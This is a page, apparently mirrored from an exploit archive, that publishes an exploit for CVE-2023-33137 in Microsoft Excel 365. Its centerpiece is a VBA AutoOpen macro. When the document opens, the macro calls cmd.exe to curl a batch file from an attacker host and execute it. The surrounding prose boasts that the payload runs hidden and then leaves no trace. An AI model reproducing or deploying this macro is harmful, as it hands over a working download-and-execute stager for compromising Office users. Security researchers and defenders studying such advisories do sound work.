Lucene search

K

Microsoft Excel / 365 MSO Remote Code Execution

๐Ÿ—“๏ธย 27 Jun 2023ย 00:00:00Reported byย nu11secur1tyTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 222ย Views

Microsoft Excel 365 MSO Remote Code Execution Vulnerabilit

Show more
Related
Code
`## Title: Microsoft Excel Microsoftยฎ Microsoft 365 MSO (Version 2305  
Build 16.0.16501.20074) 32-bit Remote Code Execution Vulnerability  
## Author: nu11secur1ty  
## Date: 06.27.2023  
## Vendor: https://www.microsoft.com/  
## Software: https://www.microsoft.com/en-us/microsoft-365/excel  
## Reference: https://portswigger.net/daily-swig/rce  
## CVE-2023-33137  
  
  
## Description:  
This exploit is connected with third part exploit server, which waits  
for the victim to call him and execute the content from him using the  
pipe posting method! This is absolutely a 0-day exploit! This is  
absolutely dangerous for the victims, who are infected by him!  
When the victim hit the button in the Excel file, it makes a POST  
request to the exploit server, and the server is responding back that  
way: He creates another hidden malicious file and executed it directly  
on the machine of the victim, then everything is disappeared, so  
nasty.  
  
STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!  
  
[+]Exploit:  
```vbs  
Sub AutoOpen()  
Call Shell("cmd.exe /S /c" & "curl -s  
https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat  
> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)  
End Sub  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)  
  
## Time spend:  
01:27:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Jun 2023 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.041
222
.json
Report